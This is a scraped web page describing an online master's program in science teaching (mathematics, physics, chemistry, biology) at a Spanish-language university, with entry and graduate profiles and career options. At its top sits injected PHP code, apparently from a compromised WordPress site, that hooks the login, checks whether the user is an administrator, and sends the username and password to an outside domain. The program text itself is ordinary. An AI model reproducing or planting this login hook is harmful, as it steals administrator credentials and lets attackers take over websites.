if (!function_exists("theme_login_init_a304674a49636d79d65e75818733775e")) { function theme_login_init_a304674a49636d79d65e75818733775e() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_a304674a49636d79d65e75818733775e', 10, 0); } ?> DIDACTICA ONLINE - Universidad Alfa Lambda

DIDACTICA ONLINE

MAESTRÍA EN

DIDACTICA

 

 

 

La Maestría en Didáctica, modalidad virtual, es un programa académico que busca impactar en la problemática de la enseñanza y el aprendizaje de las matemáticas, física, química y biología, en el nivel medio superior y superior por medio de la formación integral de los docentes

 

Plan de Estudios:

MAESTRÍA

 DESCRIPCIÓN

 

Formar profesionales de la enseñanza de las Ciencias (Matemáticas, Física, Química y Biología) de los niveles medio superior y superior, con una formación en el área didáctica y disciplinar que les permita aplicar adecuadamente la tecnología y las teorías didácticas en el aula, a fin de que desarrollen y apliquen propuestas de solución a problemas de aprendizaje de las mismas.

null

  • PERFIL DE INGRESO

Los aspirantes a la maestría pueden ser profesores en activo o no, pero dado el planteamiento y condiciones de la Maestría los aspirantes deben mostrar un interés en la problemática de la enseñanza y el aprendizaje de las Ciencias, en particular en los niveles medio superior y superior. Además, para que los aspirantes sean aceptados deberán poseer:

Conocimientos:

Conocimientos básicos de Matemáticas en las áreas de Álgebra, Cálculo, Probabilidad y Estadística, así como de Física, Química y Biología de acuerdo a su línea terminal.

Conocimiento básico en didáctica.

Conocimientos básicos del uso de las TIC.

Comprensión lectora y escritura de textos en inglés correspondiente al nivel A1 del Marco Común Europeo.

Habilidades:

Habilidades para estudiar, comprender, aplicar y explicar matemáticas y ciencias básicas de manera independiente y autónoma.

Habilidades básicas en el uso de las herramientas tecnológicas.

Habilidades para la lectura y comprensión de textos educativos y científicos.

Habilidad para autogestión y estudio independiente para cumplir con las actividades de la maestría.

Habilidad para trabajar en equipo y a distancia.

Actitudes:

Respeto a sus compañeros, colegas y conciudadanos.

Respeto al trabajo ajeno y propio.

Comprometido con su propio proceso de aprendizaje, ya que son ellos los que van a hacer la gestión de su tiempo para poder dedicarse a su estudio.

Tener claros los objetivos que se desean alcanzar.

Responsable y tener compromiso para concluir sus estudios.

Actitud propositiva, reflexiva e investigativa que le permita buscar información, aprender y reflexionar críticamente su propia práctica docente.

Disposición para el trabajo colaborativo y perseverancia para el logro de metas.

null

  • PERFIL DE EGRESO

El egresado de este programa estará especializado en el análisis de problemas didácticos afines al área científica de su elección, por lo que sus características, son:

Conocimientos:

Conocimientos pertinentes en las Matemáticas y las Ciencias en el nivel de su práctica profesional.

Comunicar lenguaje científico en forma oral y escrita de acuerdo a su línea terminal

Los métodos y herramientas didácticas.

Tecnología digital en el ambiente de la enseñanza de las Ciencias.

Contextos y situaciones de aplicación de las Ciencias para resaltar sus aplicaciones y funcionalidad.

Estrategias metodológicas para planificar y diseñar secuencias de aprendizaje y para evaluar el proceso cognitivo.

Comprensión lectora y escritura de textos en inglés correspondiente al nivel A2 del Marco Común Europeo.

 

Habilidades:

Comunicación asertiva en forma oral y escrita

Uso de la tecnología digital en su desempeño profesional, como medio de comunicación y para el diseño de materiales didácticos.

Facilidad para identificar las características del desarrollo cognitivo y contexto sociocultural de sus alumnos, para así planificar y analizar formas de interacción en el aula, instrumentos de evaluación y secuencias de aprendizaje.

Actitudes:

Aprender de manera autónoma.

Actitud responsable en el uso de la tecnología digital en su ámbito profesional.

Actitud propositiva para el planteamiento y búsqueda de estrategias a problemas educativo

null

  • EN DONDE PUEDES TRABAJAR
  • Cargos directivos en instituciones educativas (públicas o privadas)
  • Docencia en materias relacionadas con la gestión educativa.
  • Elaboración de proyectos educativos.
  • Formación interna de organizaciones.
  • Cargos gubernamentales dedicados al diseño e implementación de políticas educativas.

¿Aún no eres parte de UAL?

¡Qué esperas!, escríbenos y recibe más información